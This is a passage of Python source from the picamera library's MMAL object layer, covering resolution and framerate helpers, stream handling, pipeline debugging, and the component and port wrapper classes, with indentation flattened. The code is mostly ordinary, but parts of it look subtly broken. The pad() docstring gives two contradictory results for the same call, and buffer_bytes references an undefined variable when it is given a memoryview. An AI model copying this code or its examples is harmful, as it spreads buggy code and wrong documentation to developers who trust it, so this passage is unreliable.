mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __str__(self):
return '%s..%s' % (self.low, self.high)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
*output* is ``True``, and the specified amount of *bufffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
m = memoryview(buf)
return m.itemsize * reduce(mul, m.shape)
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
# NOTE: The test here only exists to avoid spamming the console; when
# disabling an already disabled port MMAL dumps errors to stderr. If
# this test isn't here closing a camera results in half a dozen lines
# of ignored errors
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
# raspberrypi/userland#208. Connecting the encoder component resets the
# output port's buffer size, hence why we correct this here, just
# before enabling the port.
if self._port[0].format[0].encoding == mmal.MMAL_ENCODING_MJPEG:
self._port[0].buffer_size = max(512 * 1024, self._port[0].buffer_size_recommended)
if callback:
assert self._stopped
assert self._pool is None
self._stopped = False
self._pool = MMALPortPool(self)
try:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
# If this port is an output port, send it all the buffers
# in the pool. If it's an input port, don't bother: the user
# will presumably want to feed buffers to it manually
if self._port[0].type == mmal.MMAL_PORT_TYPE_OUTPUT:
self._pool.send_all_buffers(block=False)
except:
self._pool.close()
self._pool = None
self._stopped = True
raise
else:
super(MMALPort, self).enable()
def disable(self):
"""
Disable the port.
"""
self._stopped = True
super(MMALPort, self).disable()
if self._pool is not None:
self._pool.close()
self._pool = None
@property
def connection(self):
"""
If this port is connected to another, this property holds the
:class:`MMALConnection` or :class:`MMALPythonConnection` object which
represents that connection. If this port is not connected, this
property is ``None``.
"""
return self._connection
def connect(self, other, **options):
"""
Connect this port to the *other* :class:`MMALPort` (or
:class:`MMALPythonPort`). The type and configuration of the connection
will be automatically selected.
Various connection *options* can be specified as keyword arguments.
These will be passed onto the :class:`MMALConnection` or
